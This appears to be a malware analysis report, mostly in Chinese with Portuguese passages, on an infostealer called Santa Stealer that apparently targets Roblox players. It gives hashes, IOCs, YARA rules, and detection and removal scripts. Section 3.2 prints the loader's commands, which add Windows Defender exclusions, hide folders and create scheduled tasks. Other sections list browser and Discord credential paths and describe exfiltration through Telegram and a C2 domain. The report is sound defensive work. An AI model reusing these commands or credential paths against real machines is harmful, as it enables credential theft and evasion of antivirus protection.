coddrake/santastealer

# 恶意软件分析技术报告 ## Santa Stealer (Xenostrarperrer.exe) **分析师：** coddrake **分析日期：** 05/04/2026 **案例 ID：** CS-2026-0405-001 **分类：** 严重 (CRÍTICO) **状态：** 分析完成 (ANÁLISE CONCLUÍDA) ## 1. 执行摘要 | 字段 | 值 | |-------|-------| | **恶意软件名称** | Santa Stealer | | **文件名** | Xenostrarperrer.exe | | **类型** | 木马窃取程序 | | **平台** | Windows (x64) | | **家族** | SantaStealer | | **传播向量** | 社会工程学 + 通过 YouTube 传播 Roblox 模组 | | **C2/外泄** | Telegram Bot API | **摘要：** Santa Stealer 是一种现代信息窃取恶意软件，它使用经过混淆的 PowerShell 作为 loader，禁用 Windows Defender，收集浏览器（Chrome、Opera、Edge）凭据和 Discord token，并通过 Telegram Bot API 外泄数据。已识别的攻击活动通过针对游戏 Roblox 的虚假模组瞄准儿童和青少年。 ## 2. 身份识别 ### 2.1. 哈希值 | 算法 | 哈希值 | |-----------|------| | **MD5** | `85a5ac802b4e17e8ea312690ef37e1a7` | | **SHA1** | `cb0332ba3d9b9ce70d34a1ce5b953ab085bc6bff` | | **SHA256** | `6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91` | | **SSDEEP** | `24576:tYZhc8MJsGkP1IHVH2yAJju5zvcokwoPQxMXvocDYvMpVIQJtHLmEQrIVIUxemuG:tYr/q16vybW/oHK` | ### 2.2. PE 签名 | 字段 | 值 | |-------|-------| | **Magic Number** | MZ (4D 5A) | | **Machine Type** | AMD64 (0x8664) | | **PE Type** | PE32+ (64-bit) | | **Subsystem** | Windows GUI | | **Linker Version** | 14.36 | | **Entry Point** | 0x140001000 | ### 2.3. 可执行文件节 | 节 | 虚拟地址 | 虚拟大小 | 原始大小 | 熵 | |-------|----------------|--------------|----------|---------| | `.text` | 0x1000 | 0x17000 | 0x16000 | 6.71 | | `.data` | 0x18000 | 0x4000 | 0x2000 | 5.23 | | `.rdata` | 0x1C000 | 0x4000 | 0x3800 | 6.45 | | `.pdata` | 0x20000 | 0x4000 | 0x3000 | 6.12 | | `.xdata` | 0x24000 | 0x4000 | 0x2000 | 5.98 | | `.rsrc` | 0x30000 | 0xE000 | 0xD800 | 7.82 | | `.reloc` | 0x3E000 | 0x2000 | 0x1800 | 5.67 | ## 3. 行为分析 ### 3.1. 初始执行 恶意软件由受害者直接执行（社会工程学）。执行后： 1. **反沙箱：** 启动恶意操作前等待 20 秒 2. **虚拟机检查：** 通过 CPUID 指令检查虚拟环境是否存在 ### 3.2. PowerShell Loader 二进制文件执行带有以下参数的经过混淆的 PowerShell loader： ``` powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [BASE64] # 创建隐藏目录 $p1 = "$env:LOCALAPPDATA\Microsoft\Office\Broker" $p2 = "$env:LOCALAPPDATA\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp" # 隐藏文件/目录 attrib +h +s $p1 attrib +h +s $p2 # 禁用 Windows Defender reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /reg:64 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v $p1 /t REG_DWORD /d 0 /f /reg:64 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v $p2 /t REG_DWORD /d 0 /f /reg:64 # 通过计划任务实现持久化 schtasks /create /tn "WindowsSystemService" /tr "$p1\svchost.exe" /sc onlogon /rl highest /f schtasks /create /tn "RuntimeBrokerService" /tr "$p2\RuntimeBroker.exe -Embedding" /sc onlogon /rl highest /f ``` # C2_Domain: bill-proof.cc:443 ``` Protocol: HTTPS Encryption: AES-256-CBC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 ``` # 3.4. 数据收集 恶意软件访问以下位置以提取数据： ``` Alvo Caminho Dados Coletados Chrome %LOCALAPPDATA%\Google\Chrome\User Data\Local State Chave DPAPI mestra Chrome %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data Credenciais Opera %APPDATA%\Opera Software\Opera Stable\Local State Chave DPAPI Opera %APPDATA%\Opera Software\Opera Stable\Login Data Credenciais Edge %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State Chave DPAPI Discord %APPDATA%\Discord\Local Storage\leveldb\*.ldb Tokens de autenticação Desktop %USERPROFILE%\Desktop\*.exe, *.dat, *.json Carteiras crypto ``` ### 3.5. 通过 Telegram 外泄 ``` Exfiltration_Method: Telegram Bot API Endpoint: https://api.telegram.org/bot/sendDocument Bot_Token: [REDACTED - presente no binário] Format: ZIP compactado Content: Credenciais, cookies, tokens, arquivos ``` # 4. 十六进制与字符串分析 ### 4.1. 提取的关键字符串 ### 收集路径 ``` C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Local State %APPDATA%\Opera Software\Opera Stable\Local State %APPDATA%\Discord\Local Storage\leveldb\*.ldb ``` ### 持久化 ``` Software\Microsoft\Windows\CurrentVersion\Run SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths WindowsSystemService RuntimeBrokerService ``` ``` ### C2 和数据渗出 bill-proof.cc api.telegram.org Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ``` ### 4.2. 已识别的 Hex 模式 ``` Offset Padrão Hex Significado 0x00 4D 5A 90 00 MZ Header 0x80 50 45 00 00 64 86 PE Header + Machine x64 0x1A30 FF 15 3A 2C 00 00 Call CreateFileW 0x1A80 FF 15 42 2C 00 00 Call CryptAcquireContextW 0x29A2C NN NN NN : A A H ... Telegram Bot Token ``` ### 4.3. 导入函数 ``` DLL Função Propósito KERNEL32.dll CreateFileW, ReadFile, WriteFile Manipulação de arquivos KERNEL32.dll CreateProcessW, TerminateProcess Execução de processos ADVAPI32.dll RegOpenKeyExW, RegSetValueExW Manipulação de registro CRYPT32.dll CryptAcquireContextW, CryptDecrypt DPAPI/AES decryption WINHTTP.dll WinHttpOpen, WinHttpSendRequest Conexão C2 ``` # 5. MITRE ATT&CK 映射 ``` Tática Técnica ID Implementação Observada Initial Access Phishing via Service T1566.003 Falsos mods de Roblox no YouTube Execution PowerShell T1059.001 Loader ofuscado Execution Scheduled Task T1053.005 WindowsSystemService, RuntimeBrokerService Persistence Scheduled Task T1053.005 Execução no logon do usuário Defense Evasion Disable Windows Defender T1562.001 Exclusões no registro Defense Evasion Hidden Files/Directories T1564.001 attrib +h +s Defense Evasion Obfuscated Files/Info T1027 PowerShell encoded command Credential Access Credentials from Browsers T1555.003 Chrome/Opera/Edge Login Data Collection Data from Local System T1005 Arquivos, wallets, tokens Exfiltration Exfiltration via C2 Channel T1041 Telegram Bot API C2 Encrypted Channel T1573 AES-256-CBC + HTTPS ``` # 6. 失陷指标 (IOCs) 6.1. 哈希值 (Blocklist) ``` iocs: hashes: md5: 85a5ac802b4e17e8ea312690ef37e1a7 sha1: cb0332ba3d9b9ce70d34a1ce5b953ab085bc6bff sha256: 6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91 ``` ### 6.2. 网络 ``` iocs: network: - domain: bill-proof.cc port: 443 protocol: HTTPS - domain: api.telegram.org port: 443 protocol: HTTPS - cidr: 149.154.167.0/24 - cidr: 91.108.56.0/22 ``` ### 6.3. 文件和目录 ``` iocs: paths: - C:\Users\%username%\AppData\Local\Microsoft\Office\Broker\ - C:\Users\%username%\AppData\Local\Microsoft\Office\Broker\svchost.exe - C:\Users\%username%\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp\ - C:\Users\%username%\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp\RuntimeBroker.exe - C:\Users\%username%\AppData\Local\Temp\*.zip ``` ### 6.4. 注册表 ``` iocs: registry: - HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ``` ### 6.5. 计划任务 ``` iocs: scheduled_tasks: - WindowsSystemService - RuntimeBrokerService ``` # 7. YARA 规则 ### 7.1. 基于字符串的检测 ``` rule SantaStealer_Xenostrarperrer_Strings { meta: description = "Detects Santa Stealer malware based on extracted strings" author = "coddrake" date = "2026-04-07" hash = "6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91" strings: $opera = "%APPDATA%\\Opera Software\\Opera Stable" wide ascii $defender_excl = "Windows Defender\\Exclusions\\Paths" wide ascii $task1 = "WindowsSystemService" ascii $task2 = "RuntimeBrokerService" ascii $telegram = "api.telegram.org" ascii $user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" ascii condition: uint16(0) == 0x5A4D and 3 of them } ``` ### 7.2. 基于 Hex 模式的检测 ``` rule SantaStealer_Xenostrarperrer_Hex { meta: description = "Detects Santa Stealer based on hex patterns" author = "coddrake" date = "2026-04-07" strings: $mz = { 4D 5A 90 00 } $pe_x64 = { 50 45 00 00 64 86 } $createfile = { FF 15 3A 2C 00 00 } $crypt_acquire = { FF 15 42 2C 00 00 } condition: $mz at 0 and $pe_x64 at 0x80 and all of them } ``` # 8. 检测脚本 (PowerShell) ``` <# .SYNOPSIS Detecta indicadores do Santa Stealer no sistema .AUTHOR coddrake .DATE 2026-04-07 #> param( [string]$ComputerName = "localhost" ) Write-Host "[*] Santa Stealer Detection Script" -ForegroundColor Cyan Write-Host "[*] Author: coddrake" -ForegroundColor Cyan Write-Host "[*] Date: 2026-04-07" -ForegroundColor Cyan Write-Host "" $detections = @() # 1. 检查已知哈希 $knownHashes = @( "85a5ac802b4e17e8ea312690ef37e1a7", # MD5 "6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91" # SHA256 ) Write-Host "[*] Verificando hashes conhecidos..." -ForegroundColor Yellow $files = Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue foreach ($file in $files) { try { $hash = Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue if ($knownHashes -contains $hash.Hash) { $detections += "[!] ARQUIVO MALICIOSO: $($file.FullName)" Write-Host "[!] ARQUIVO MALICIOSO: $($file.FullName)" -ForegroundColor Red } } catch {} } # 2. 检查计划任务 Write-Host "[*] Verificando tarefas agendadas..." -ForegroundColor Yellow $suspiciousTasks = @("WindowsSystemService", "RuntimeBrokerService") foreach ($task in $suspiciousTasks) { $exists = schtasks /query /tn $task 2>$null if ($exists) { $detections += "[!] TAREFA SUSPEITA: $task" Write-Host "[!] TAREFA SUSPEITA: $task" -ForegroundColor Red } } # 3. 检查 Windows Defender 排除项 Write-Host "[*] Verificando exclusões do Windows Defender..." -ForegroundColor Yellow $exclusions = Get-MpPreference -ErrorAction SilentlyContinue | Select-Object -ExpandProperty ExclusionPath foreach ($excl in $exclusions) { if ($excl -match "Broker|PeopleExperience") { $detections += "[!] EXCLUSÃO SUSPEITA: $excl" Write-Host "[!] EXCLUSÃO SUSPEITA: $excl" -ForegroundColor Red } } # 4. 检查可疑文件夹 Write-Host "[*] Verificando pastas suspeitas..." -ForegroundColor Yellow $suspiciousPaths = @( "$env:LOCALAPPDATA\Microsoft\Office\Broker", "$env:LOCALAPPDATA\Packages\*PeopleExperienceHost*\AC\Temp" ) foreach ($path in $suspiciousPaths) { $resolved = Resolve-Path $path -ErrorAction SilentlyContinue if ($resolved) { $detections += "[!] PASTA SUSPEITA: $resolved" Write-Host "[!] PASTA SUSPEITA: $resolved" -ForegroundColor Red } } # 5. 检查与 Telegram 的连接 Write-Host "[*] Verificando conexões com Telegram..." -ForegroundColor Yellow $telegramIPs = @("149.154.167.", "91.108.56.") $connections = netstat -ano | Select-String -Pattern $telegramIPs if ($connections) { $detections += "[!] CONEXÃO COM TELEGRAM DETECTADA" Write-Host "[!] CONEXÃO COM TELEGRAM DETECTADA" -ForegroundColor Red $connections | ForEach-Object { Write-Host " $_" -ForegroundColor Yellow } } # 最终报告 Write-Host "" Write-Host "========================================" -ForegroundColor Cyan Write-Host "[*] RELATÓRIO DE DETECÇÃO" -ForegroundColor Cyan Write-Host "========================================" -ForegroundColor Cyan if ($detections.Count -eq 0) { Write-Host "[+] Nenhum indicador encontrado." -ForegroundColor Green } else { Write-Host "[-] $($detections.Count) indicador(es) encontrado(s):" -ForegroundColor Red $detections | ForEach-Object { Write-Host " $_" -ForegroundColor Red } } Write-Host "" Write-Host "[*] Fim da análise." -ForegroundColor Cyan ``` # 9. 清除脚本 ``` <# .SYNOPSIS Remove o Santa Stealer do sistema infectado .AUTHOR coddrake .DATE 2026-04-07 .NOTES Execute como Administrador #> Write-Host "[*] Iniciando remediação do Santa Stealer" -ForegroundColor Cyan Write-Host "[*] Author: coddrake" -ForegroundColor Cyan # 1. 终止恶意进程 Write-Host "[*] Matando processos maliciosos..." -ForegroundColor Yellow $maliciousProcesses = @("svchost.exe", "RuntimeBroker.exe") foreach ($proc in $maliciousProcesses) { Get-Process -Name $proc -ErrorAction SilentlyContinue | Where-Object { $_.Path -match "Broker|PeopleExperience" } | Stop-Process -Force -ErrorAction SilentlyContinue Write-Host "[+] Processos finalizados" -ForegroundColor Green } # 2. 删除计划任务 Write-Host "[*] Removendo tarefas agendadas..." -ForegroundColor Yellow schtasks /delete /tn "WindowsSystemService" /f 2>$null schtasks /delete /tn "RuntimeBrokerService" /f 2>$null Write-Host "[+] Tarefas removidas" -ForegroundColor Green # 3. 删除 Windows Defender 排除项 Write-Host "[*] Removendo exclusões do Windows Defender..." -ForegroundColor Yellow $exclusions = Get-MpPreference -ErrorAction SilentlyContinue | Select-Object -ExpandProperty ExclusionPath foreach ($excl in $exclusions) { if ($excl -match "Broker|PeopleExperience") { Remove-MpPreference -ExclusionPath $excl -ErrorAction SilentlyContinue Write-Host "[+] Exclusão removida: $excl" -ForegroundColor Green } } # 4. 删除恶意文件 Write-Host "[*] Removendo arquivos maliciosos..." -ForegroundColor Yellow $paths = @( "$env:LOCALAPPDATA\Microsoft\Office\Broker", "$env:LOCALAPPDATA\Packages\*PeopleExperienceHost*\AC\Temp" ) foreach ($path in $paths) { if (Test-Path $path) { Remove-Item $path -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Removido: $path" -ForegroundColor Green } } # 5. 恢复 PowerShell 执行策略 Write-Host "[*] Restaurando política de execução..." -ForegroundColor Yellow Set-ExecutionPolicy Restricted -Scope LocalMachine -Force -ErrorAction SilentlyContinue Write-Host "[+] Política restaurada" -ForegroundColor Green # 6. 强制更新 Windows Defender Write-Host "[*] Atualizando Windows Defender..." -ForegroundColor Yellow Update-MpSignature -ErrorAction SilentlyContinue Write-Host "[+] Defender atualizado" -ForegroundColor Green Write-Host "" Write-Host "[*] REMEDIAÇÃO CONCLUÍDA" -ForegroundColor Green Write-Host "[*] Recomenda-se reiniciar o sistema" -ForegroundColor Yellow ``` # 10. 结论与建议 ### 10.1. 结论 ``` Malware Confirmado Santa Stealer (Xenostrarperrer.exe) Capacidades Stealer de credenciais, persistência, evasão de defesa Alvo Primário Crianças e adolescentes (jogadores de Roblox) Vetor de Distribuição YouTube + mods de Roblox Infraestrutura C2 bill-proof.cc + Telegram API ``` ### 10.2. 给组织的建议 在防火墙、代理和防病毒软件上阻止 IOC 在网络层面阻止 api.telegram.org（如果企业内部未使用） 限制非管理员用户的 PowerShell 权限 实施 AppLocker 以阻止在 %APPDATA% 和 %TEMP% 中执行 通过 SIEM 监控计划任务的创建 教育用户（尤其是家长和青少年）了解非官方下载的风险 ### 10.3. 给最终用户的建议 切勿从 YouTube 链接下载文件 警惕“免费 Robux”、“模组”、“外挂”等诱饵 保持 Windows Defender 开启并更新 在计算机上启用家长控制 如果怀疑感染，请更改密码 # 11. 附录 ### 11.1. 技术参考 MITRE ATT&CK: https://attack.mitre.org NIST SP 800-83: 恶意软件事件响应指南 ISO/IEC 27001:2022 A.8.7: 恶意软件防护 ``` ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ──────── ██████████████████████████████████████████ ─ ──────── █ ───────────────────────────────────── █ ─ ──────── █ ASSINADO: coddrake █ ─ ──────── █ ANALISTA DE MALWARE █ ─ ──────── █ 2026-04-07 █ ─ ──────── ██████████████████████████████████████████ ─ ────────────────────────────────────────────────────── ```

标签：AI合规, Burp Suite 替代, C2通信, Chrome, DAST, DeepSeek, Discord Token, Edge, ESC8, Infostealer, OpenCanary, Opera, PE分析, PowerShell Loader, Roblox, Santa Stealer, Telegram Bot, Windows Defender, x64, 信息窃取木马, 哈希校验, 威胁情报, 开发者工具, 恶意软件分析, 搜索语句（dork）, 数据外渗, 浏览器凭证窃取, 混淆代码, 游戏诈骗, 熵值分析, 社会工程学, 速率限制